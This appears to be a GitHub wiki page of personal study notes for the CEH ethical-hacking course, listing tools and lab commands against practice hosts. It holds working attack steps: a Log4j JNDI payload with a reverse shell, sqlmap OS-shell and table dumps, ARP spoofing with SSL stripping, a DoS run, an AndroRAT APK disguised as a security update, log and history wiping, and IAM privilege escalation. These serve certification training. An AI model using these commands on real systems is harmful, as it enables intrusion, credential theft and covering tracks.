CEH - yenbohuang/techNotes GitHub Wiki

EC-Council Websites

URL Note
https://aspen.eccouncil.org/ Main portal for certificates, renewal, etc.
https://aspen.eccouncil.org/Verify Verify certificate by candidate name and certification number.
https://codered.eccouncil.org Online learning
https://cert.eccouncil.org/ece-policy.html ECE Policy
https://bookshelf.vitalsource.com Training manual
https://eccouncil.learnondemand.net/User/Register?OrganizationId=1133 iLab
https://www.eccexam.com/ Exam center
https://www.hackerverse.com/ Hackerverse is a global cybersecurity competition ecosystem designed by EC-Council to support and advance the cybersecurity community worldwide.

How to share the badge on LinkedIn?

Useful Websites

General

URL Note
http://www.certifiedhacker.com Target website for hacking practice.
https://osintframework.com/ Lists various OSINT tools arranged by category
https://www.exploit-db.com/ CVE compliant archive of public exploits and corresponding vulnerable software.
https://www.exploit-db.com/google-hacking-database Google hacking samples.
https://www.cve.org/ Identify, define, and catalog publicly disclosed cybersecurity vulnerabilities.
https://cwe.mitre.org/ Community-developed list of common software and hardware weaknesses.
https://nvd.nist.gov/ Security checklist references, security-related software flaws, product names, and impact metrics.
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator CVSS Calculator

Information Gathering

URL Note
https://www.netcraft.com Extract the company’s domains and sub-domains.
https://search.censys.io/?q= Gather target OS information through passive footprinting.
https://centralops.net Investigate domains and IP addresses, DNS records, traceroute, nslookup, whois searches, etc.
http://whois.domaintools.com Whois lookup
https://www.whois.com/whois/ Whois lookup
http://www.kloth.net/services/nslookup.php Gather DNS Information
https://www.shodan.io/ Search IoT devices.
https://mattw.io/youtube-metadata/ Collects singular details of a video, its uploader, playlist and its creator or channel.

System Hacking

URL Note
https://georgeom.net/StegOnline/upload An image steganography tool that hides data inside images.

Malware Threats

URL Note
https://www.virustotal.com Analyse suspicious files, domains, IPs and URLs to detect malware and other breaches, automatically share them with the security community.
https://www.hybrid-analysis.com Free malware analysis service for the community that detects and analyzes unknown threats using a unique Hybrid Analysis technology.

Social Engineering

URL Note
https://www.phishtank.com/ PhishTank is a free community site on which anyone can submit, verify, track, and share phishing data.
https://ciso.eccouncil.org/phishing-solutions/ OhPhish is a phishing simulation tool that provides an organization with a platform to launch phishing simulation campaigns on its employees.

Hacking Mobile Platforms

URL Note
https://www.sisik.eu/apk-tool Sixo Online APK Analyzer allows you to analyze various details about Android APK files. It can decompile binary XML files and resources.

Cryptography

URL Note
https://www.rmail.com/free-trial/ RMail is an email security tool that provides open tracking, proof of delivery, email encryption, electronic signatures, large file transfer functionality, etc.

Using iLab

Parrot Security VM

  • We need to start Apache httpd for sharing/downloading/running malicious files on Windows:
sudo su
mkdir /var/www/html/share
chmod -R 755 /var/www/html/share
chown -R www-data:www-data /var/www/html/share
cp <malicious files> /var/www/html/share
service apache2 start
  • We need to connect Windows 11 shared folder for malicious tools provided by CEH training package:
    • Top menu bar -> Places -> Desktop -> Network.
    • Press Ctrl+L.
    • Location bar -> smb://10.10.1.11 (the IP address for Windows 11 VM).
    • Enter Windows username/password.

Information Gathering

Linux

Command Note
theHarvester -d microsoft.com -l 200 -b baidu theHarvester: Gathers names, emails, IPs, subdomains, and URLs by using multiple public resources.
python3 photon.py -u http://www.certifiedhacker.com -l 3 -t 200 --wayback photon.py: A fast and flexible crawler designed for open source intelligence (OSINT).
python3 grecon.py grecon.py: Automates the process of Google Based Recon AKA Google Dorking.
cewl -w wordlist.txt -d 2 -m 5 https://www.certifiedhacker.com cewl: Collect word list for password crackers.
./dnsrecon.py -r 162.241.216.0-162.241.216.255 dnsrecon.py: Reverse DNS operation is performed to obtain the domain name of a given IP address.
traceroute www.certifiedhacker.com Network tracerouting.
domainfy -n www.certifiedhacker.com -t all osrframework: Use domainfy to check with the existing domains using words and nicknames.
python3 billcipher.py BillCipher: Gather information such as DNS Lookup, Whois lookup, GeoIP Lookup, Subnet Lookup, Port Scanner, Page Links, Zone Transfer, HTTP Header, etc.

Windows

Command Note
tracert -h 5 www.certifiedhacker.com Network tracerouting.

Querying the DNS to obtain a domain name or IP address mapping or for any other specific DNS record.

nslookup

> set type=a
> www.certifiedhacker.com

> set type=cname
> certifiedhacker.com

> set type=a
> ns1.bluehost.com

Network Scanning

Command Note
unicornscan 10.10.1.22 -Iv unicornscan: Perform OS discovery on the target system.

sx scan command.

# Create ARP cache
sx arp 10.10.1.0/24 --json | tee arp.cache

# List all open ports
cat arp.cache | sx tcp -p 1-65535 10.10.1.11

# UDP scan (do not return any code -> port is open)
cat arp.cache | sx udp --json -p 53 10.10.1.11

Enumeration

Windows

Command Note
nbtstat -a 10.10.1.11 Displaying the NetBIOS name table of a remote computer.
nbtstat -c Displaying the contents of the NetBIOS name cache, the table of NetBIOS names, and their resolved IP addresses.
net use Connection status, shared folder/drive and network information.

DNS zone transfer:

nslookup
>> set querytype=soa
>> certifiedhacker.com
>> ls -d ns1.bluehost.com

Linux

Command Note
snmp-check 10.10.1.22 snmp-check: Listing sensitive information such as System information and User accounts.
snmpwalk -v2c -c public 10.10.1.22 snmpwalk: Display SNMP information (OIDs, server information, user credentials, etc.)
ldapsearch -h 10.10.1.22 -x -s base namingcontexts LDAP naming contexts.
ldapsearch -h 10.10.1.22 -x -b "DC=CEH,DC=com" More information about LDAP primary domain.
ldapsearch -x -h 10.10.1.22 -b "DC=CEH,DC=com" "objectclass=*" All LDAP objects.
echo "10.10.1.19" >> Target.txt; ./superenum SuperEnum: Enumerate NFS (taking roughly 15 - 20 minutes). Enter IP List filename with path -> Target.txt
python3 rpc-scan.py 10.10.1.19 --rpc RPCScan: Enumerate NFS.
./dnsrecon.py -d www.certifiedhacker.com DNSRecon: Enumerate DNS records.

enum4linux scan command.

Command Note
enum4linux -u <user> -p <password> -n 10.10.1.22 NetBIOS information.
enum4linux -u <user> -p <password> -U 10.10.1.22 User list.
enum4linux -u <user> -p <password> -o 10.10.1.22 OS information.
enum4linux -u <user> -p <password> -P 10.10.1.22 Password policy information.
enum4linux -u <user> -p <password> -G 10.10.1.22 Group and member list.
enum4linux -u <user> -p <password> -S 10.10.1.22 Share policy information.

Enumerate LDAP by Python ldap3:

python3
>>> import ldap3
>>> server=ldap3.Server('10.10.1.22', get_info=ldap3.ALL,port=389)
>>> connection=ldap3.Connection(server)
>>> connection.bind()
>>> server.info
>>> connection.search(search_base='DC=CEH,DC=com', search_filter='(&(objectclass=*))', search_scope='SUBTREE', attributes='*')
>>> connection.entries
>>> connection.search(search_base='DC=CEH,DC=com', search_filter='(&(objectclass=person))', search_scope='SUBTREE', attributes='userpassword')
>>> connection.entries
>>> exit()

DNS zone transfer:

dig ns www.certifiedhacker.com
dig @ns1.bluehost.com www.certifiedhacker.com axfr

Vulnerability Analysis

nikto: web server scanner

nikto -h https://www.certifiedhacker.com -Tuning x
nikto -h https://www.certifiedhacker.com -Cgidirs all
nikto -h https://www.certifiedhacker.com -o Nikto_Scan_Results -F txt

System Hacking

Linux

Command Note
nc -nvlp 4444 Listen on port 4444.
tcpdump -nvvx port 8888 -i lo Do tcpdump on port 8888. 
# start responder
sudo responder -I eth0

# Wait for Windows user to connect by shared folder.
# Copy hash value into "hash.txt"
# Run John the Ripper and crack password.

john hash.txt

Covert Channels using Covert_TCP

General step: compile covert_tcp

# Connect to Windows 11 by "smb://10.10.1.11"
# Download from "CEH-Tools\CEHv12 Module 06 System Hacking\Covering Tracks Tools\Covert_TCP\covert_tcp.c"
cc -o covert_tcp covert_tcp.c

In Ubuntu

  • Messages will not be monitored by tcpdump, but it is visible in Wiredshark.
# Run as "ubuntu"
mkdir ~/Desktop/Receive
cd ~/Desktop/Receive

# Compile "covert_tcp" and run the following commands.
sudo su
./covert_tcp -dest 10.10.1.9 -source 10.10.1.13 -source_port 9999 -dest_port 8888 -server -file /home/ubuntu/Desktop/Receive/receive.txt

In Parrot Security

# Run as "attacker".
mkdir ~/Desktop/Send
cd ~/Desktop/Send
echo "Secret Message" > message.txt

# Compile "covert_tcp" and run the following commands.
sudo su
./covert_tcp -dest 10.10.1.9 -source 10.10.1.13 -source_port 8888 -dest_port 9999 -file /home/attacker/Desktop/Send/message.txt

Clear Linux Machine Logs using the BASH Shell

Command Description
export HISTSIZE=0 Disable bash history.
history -c Clear the stored history
history -w Delete the history of the "current shell".
shred ~/.bash_history Shred the history file, making its content unreadable.

Clear logs in one line:

shred ~/.bash_history && cat /dev/null > ~/.bash_history && history -c && exit

Windows

Hide Files using NTFS Streams

# Hide "calc.exe" in "readme.txt"
type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe
del c:\magic\calc.exe

# Create a symbolic link to "calc.exe"
mklink backdoor.exe readme.txt:calc.exe
backdoor.exe

Hide Data using White Space Steganography

snow -C -m "My swiss bank account number is 45656684512263" -p "magic" readme.txt readme2.txt
snow -C -p "magic" readme2.txt

Clear Logs to Hide the Evidence of Compromise

View, Enable, and Clear Audit Policies using Auditpol (Run as Administrator)

Command Description
auditpol /get /category:* View all the audit policies.
auditpol /set /category:"system","account logon" /success:enable /failure:enable Enable the audit policies.
auditpol /clear /y Clear the audit policies.

Wipe out the logs of the target system (Run as administrator):

E:\CEH-Tools\CEHv12 Module 06 System Hacking\Covering Tracks Tools\Clear_Event_Viewer_Logs.bat\Clear_Event_Viewer_Logs.bat

Using wevtutil:

Command Description
wevtutil el Lists event log names.
wevtutil cl [log_name] Clear a specific event log (e.g., system, application, and security).

Securely delete data by overwriting it to prevent recovery.

cipher /w:[Drive or Folder or File Location]

Hiding Artifacts

Hide/unhide file or folder:

attrib +h +s +r <folder or file>
attrib -s -h -r <folder or file>

Hide user accounts:

net user <username> /add
net user <username> /active:yes
net user <username> /active:no

Sniffing

Command Description
macof -i eth0 -n 10 Flooding the CAM table with random MAC addresses.
yersinia -I Yersinia is a network tool designed to take advantage of weaknesses in different network protocols such as DHCP. E.g., DHCP Starvation Attack: Press F2 -> x -> 1.
arpspoof -i eth0 -t <target> <host> Attackers use the arpspoof tool to obtain the ARP cache; then, the MAC address is replaced with that of an attacker’s system. Therefore, any traffic flowing from the victim to the gateway will be redirected to the attacker’s system.
habu.arp.poison 10.10.1.11 10.10.1.13 Sends ARP 'is-at' packets to the specified victim(s), poisoning their ARP tables to send their traffic to the attacker system.

Spoof a MAC Address of Linux Machine using macchanger

ifconfig eth0 down

# Print MAC address
macchanger -s eth0

# Set a random vendor MAC address
macchanger -a eth0

# Set a random MAC address
macchanger -r eth0

ifconfig eth0 up
ifconfig

Denial-of-Service

Perform a DoS Attack using Raven-storm (Layer 4 module).

sudo rst
l4

ip 10.10.1.19
port 80
threads 20000
run

<ctrl+z>

Session Hijacking

Intercept HTTP Traffic using bettercap.

bettercap -h
bettercap -iface eth0
Option Description
help View the list of available modules.
net.probe on Send different types of probe packets to each IP in the current subnet for the net.recon module to detect them.
net.recon on Periodically reading the system ARP table to detect new hosts on the network.
set http.proxy.sslstrip true Enables SSL stripping.
set arp.spoof.internal true Spoofs the local connections among computers of the internal network.
set arp.spoof.targets 10.10.1.11 Spoofs the IP address of the target host.
http.proxy on Initiates http proxy.
arp.spoof on Initiates ARP spoofing.
net.sniff on Performing sniffing on the network.
set net.sniff.regexp '.*password=.+' Only consider the packets sent with a payload matching the given regular expression.

Hacking Web Servers

Information Gathering using Ghost Eye

sudo su
cd /home/attacker/ghost_eye
pip3 install -r requirements.txt
python3 ghost_eye.py

Perform Web Server Reconnaissance using Skipfish

  • Start Wamperserver64 (pre-installed) on Windows Server 2022.

  • Run skipfish on Parrot Security:

sudo su
skipfish -o /home/attacker/test -S /usr/share/skipfish/dictionaries/complete.wl http://10.10.1.22:8080

# Run for 5 minutes and exit by ctrl+c.
# Check files under /home/attacker/test/

Footprint a Web Server using Netcat and Telnet

  • By Netcat:
nc -vv www.moviescope.com 80

# Press "enter" twice after typing this line.
GET / HTTP/1.0

# Netcat will perform the banner grabbing and gather information
  • By Telnet:
telnet www.moviescope.com 80

# Press "enter" twice after typing this line.
GET / HTTP/1.0

# Telnet will perform the banner grabbing and gather information.

Uniscan Web Server Fingerprinting in Parrot Security

HTML reports are generated under /usr/share/uniscan/report.

Command Description
uniscan -u http://10.10.1.22:8080/CEH -q Search for the directories of the web server.
uniscan -u http://10.10.1.22:8080/CEH -we Enable the file check (robots.txt and sitemap.xml file).
uniscan -u http://10.10.1.22:8080/CEH -d Performing dynamic tests, obtaining more information about email-IDs, Source code disclosures, and external hosts, web backdoors, dynamic tests.

Crack FTP Credentials using a Dictionary Attack

# Copy "/home/attacker/Desktop/CEHv12 Module 13 Hacking Web Servers/Wordlists" to "Desktop/Wordlists".
hydra -L /home/attacker/Desktop/Wordlists/Usernames.txt -P /home/attacker/Desktop/Wordlists/Passwords.txt ftp://10.10.1.11

Hacking Web Applications

Whois lookup

URL Note
https://www.netcraft.com Netcraft
https://www.tamos.com SmartWhois
https://whois.domaintools.com WHOIS Lookup
http://www.sabsoft.com Batch IP Converter

DNS interrogation

URL Note
https://github.com/darkoperator/dnsrecon DNSRecon
https://network-tools.com DNS Records
https://centralops.net Domain Dossier

Linux

Perform Web Application Reconnaissance using WhatWeb

Command Description
whatweb www.moviescope.com Website footprinting.
whatweb -v www.moviescope.com Verbosity scan.
whatweb --log-verbose=MovieScope_Report www.moviescope.com Export the results returned by WhatWeb as a text file.

Detect Load Balancers using Various Tools

Command Description
dig yahoo.com A single host resolves to multiple IP addresses, which possibly indicates that the host is using a load balancer.
lbd yahoo.com lbd (load balancing detector) detects if a given domain uses DNS and http load balancing via the Server: and Date: headers and the differences between server answers.

Identify Web Server Directories using Various Tools

Gobuster is a command-oriented tool used to brute-force URIs in websites, DNS subdomains, and names of the virtual hosts on the target server.

# copy wordlist file (used for directory brute-forcing) to Desktop
cp /home/attacker/Desktop/CEHv12\ Module\ 14\ Hacking\ Web\ Applications/common.txt /home/attacker/Desktop/

gobuster dir -u www.moviescope.com -w /home/attacker/Desktop/common.txt

Using /hmoe/attacker/dirsearch/dirsearch.py:

Command Description
python3 dirsearch.py -u http://www.moviescope.com Directory brute forcing.
python3 dirsearch.py -u http://www.moviescope.com -e aspx Lists all the files containing aspx extension.
python3 dirsearch.py -u http://www.moviescope.com -x 403 Lists the directories from the target website excluding 403 status code.

Identify a clickjacking vulnerability using ClickjackPoc:

cd /home/attacker/ClickjackPoc/
echo "http://www.moviescope.com" | tee domain.txt
python3 clickJackPoc.py -f domain.txt

Identify XSS Vulnerabilities in Web Applications using PwnXSS

cd /home/attacker/PwnXSS
python3 pwnxss.py -u http://testphp.vulnweb.com

Gain Access by Exploiting Log4j Vulnerability (CVE-2021-44228)

Run under Ubuntu:

sudo apt-get update
sudo apt-get install docker.io

cd /home/ubuntu/log4j-shell-poc/
docker build -t log4j-shell-poc .
docker run --network host log4j-shell-poc

Run under Parrot Security:

cd /home/attacker/log4j-shell-poc
  • Run in termical 2 with root permission:
cd /home/attacker
tar -xf jdk-8u202-linux-x64.tar.gz
mv jdk1.8.0_202 /usr/bin/

  • Go back to Terminal 1 and edit poc.py.

    • Edit line 62
      • Replace jdk1.8.0_20/bin/javac with /usr/bin/jdk1.8.0_202/bin/javac.
    • Edit line 87
      • Replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.
    • Edit line 99
      • Replace jdk1.8.0_20/bin/java with /usr/bin/jdk1.8.0_202/bin/java.

  • Run in terminal 3 and initiate a netcat listener.

nc -lvp 9001
  • Run in terminal 1:
python3 poc.py --userip 10.10.1.13 --webport 8000 --lport 9001

  • Copy the payload generated in the send me section.

    • Send me: ${jndi:ldap://10.10.1.13:1389/a}

  • Visit http://10.10.1.9:8080

    • Copy ${jndi:ldap://10.10.1.13:1389/a} to username field and type password in password field.

  • Sitch to the netcat (terminal 3) listener, you can see that a reverse shell is opened.

    • Use pwd and whoami and check if the reverse shell works.

Windows

Command Description
whoami Displays the user, group, and privileges information for the user currently logged onto the Windows Server machine.
tasklist View the processes running on the machine.
Taskkill /PID <Process ID> /F Forcefully (/F) terminating the process.
net user List user accounts.
net user <account name> View user account information.
net user <account name> /Add Add a user account remotely.
net localgroup Administrators <account> /Add Granted admin privileges to the account. You can login by RDP without password.

SQL Injection

Windows

Useful MSSQL scripts:

SQL Description
exec master..xp_cmdshell 'ping www.certifiedhacker.com -l 65000 -t' Run command shell by SQL.

Linux

sqlmap

  • Visit http://www.moviescope.com/viewprofile.aspx?id=1
  • Copy cookie value by running document.cookie in Firefox dev toolbar.
SQL Description
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]" --dbs Enumerates databases.
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]" -D moviescope --tables Enumerates tables in moviescope database.
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]" -D moviescope -T User_Login --dump Dump all the User_Login table content.
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]" --os-shell The prompt for an interactive OS shell.

Detect SQL Injection Vulnerabilities using Damn Small SQLi Scanner (DSSS)

  • Visit http://www.moviescope.com/viewprofile.aspx?id=1
  • Copy cookie value by running document.cookie in browser dev toolbar.
cd /home/attacker/DSSS
python3 dsss.py
python3 dsss.py -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie="[cookie value]"

Hacking Wireless Networks

aircrack-ng

SQL Description
aircrack-ng '/home/attacker/Desktop/Sample Captures/WEPcrack-01.cap' Crack the WEP key.
aircrack-ng -a2 -b [Target BSSID] -w /home/attacker/Desktop/Wordlist/password.txt '/home/attacker/Desktop/Sample Captures/WPA2crack-01.cap' Crack WPA2 network.

Hacking Mobile Platforms

Harvest Users' Credentials using the Social-Engineer Toolkit

cd /home/attacker/social-engineer-toolkit
./setoolkit

Launch a DoS Attack on a Target machine using Low Orbit Ion Cannon (LOIC) on the Android Mobile Platform

  • Launch Cx File Explorer.
  • Click 10.10.1.11 from the Network tab and navigate to CEH-Tools --> CEHv12 Module 17 Hacking Mobile Platforms --> Android Hacking Tools --> Low Orbit Ion Cannon (LOIC).
  • Install Low Orbit Ion Cannon LOIC_v1.3.apk.

Exploit the Android Platform through Android Debug Bridge (ADB) using PhoneSploit

cd /home/attacker/PhoneSploit
python3 -m pip install colorama
python3 phonesploit.py

Hack an Android Device by Creating APK File using AndroRAT

cd /home/attacker/AndroRAT
python3 androRAT.py --build -i 10.10.1.13 -p 4444 -o SecurityUpdate.apk

# Share the APK by httpd, and install on Android by visiting http://10.10.1.13/share/
cp /home/attacker/AndroRAT/SecurityUpdate.apk /var/www/html/share/

python3 androRAT.py --shell -i 0.0.0.0 -p 4444

# After the APK is installed, we can run the following commands in androRAT shell.
help
deviceInfo
getSMS inbox
getMACAddress
exit

Cloud Computing

Enumerate S3 Buckets using lazys3

lazys3 is a Ruby script tool that is used to brute-force AWS S3 buckets using different permutations.

cd /home/attacker/lazys3-master/

# find the public S3 buckets
ruby lazys3.rb

# search the S3 buckets of specific company
ruby lazys3.rb <company name>

Enumerate S3 Buckets using S3Scanner

S3Scanner is a tool that finds the open S3 buckets and dumps their contents.

cd /home/attacker/S3Scanner/
pip3 install -r requirements.txt

# Displaying a list of public S3 buckets.
# "sites.txt" is a text file containing the target website URL that is scanned for open S3 buckets.
python3 ./s3scanner.py sites.txt

Exploit Open S3 Buckets using AWS CLI

cd /root
pip3 install awscli
aws --help
aws configure

# Assume the bucket name is "certifiedhacker02"
aws s3 ls s3://certifiedhacker02

echo "You have been hacked" >> Hack.txt
aws s3 mv Hack.txt s3://certifiedhacker02
aws s3 rm s3://certifiedhacker02/Hack.txt

Escalate IAM User Privileges by Exploiting Misconfigured User Policy

cd /root
aws configure
vim user-policy.json
# {
#  "Version":"2012-10-17",
#  "Statement": [
#    { "Effect":"Allow", "Action":"*", "Resource":"*" }
#  ]
#}

aws iam create-policy --policy-name user-policy --policy-document file://user-policy.json

aws iam attach-user-policy --user-name <Target Username> --policy-arn arn:aws:iam::<Account ID>:policy/user-policy

aws iam list-attached-user-policies --user-name <Target Username>

aws s3api list-buckets --query "Buckets[].Name"
aws iam list-user-policies
aws iam list-role-policies
aws iam list-group-policies
aws iam create-user

Cryptography

Create and Use Self-signed Certificates

  • Open "Internet Information Services (IIS) Manager".
  • IIS -> Server Certificates -> Actions -> Create Self-Signed Certificate.
  • Expend "Sites" -> Edit Sites -> Bindings -> Add.
  • Refresh the site (e.g., GoodShopping) by right-click context menu.

Tools with a lot of features and deserved a standalone page

Name Child Page
hping3 CEH_hping3
recon-ng CEH_recon_ng
nmap CEH_nmap
Metasploit CEH_Metasploit
Snort CEH_Snort
Useful Applications CEH_Useful_Applications
Hacking WordPress CEH_WordPress

Contact me at https://www.linkedin.com/in/yen-bo-huang-b9565774/

⚠️ **GitHub.com Fallback** ⚠️